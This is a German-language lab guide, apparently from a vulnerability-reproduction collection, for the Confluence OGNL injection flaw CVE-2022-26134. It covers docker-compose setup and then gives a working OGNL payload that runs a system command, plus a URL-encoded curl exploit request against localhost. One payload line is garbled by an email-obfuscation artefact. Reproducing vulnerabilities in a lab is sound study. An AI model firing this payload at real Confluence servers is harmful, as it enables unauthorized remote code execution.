
Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Schwachstelle (CVE-2022-26134)
docker-compose up -d
Unter http://localhost:8090 sehen Sie Confluence laufen.
Besorgen Sie sich als Nächstes eine Evaluierungslizenz für Confluence und richten Sie die Datenbank mit dem Datenbanknamen confluence, dem Benutzernamen postgres und dem Passwort root ein.
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
curl -v "http://localhost:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%
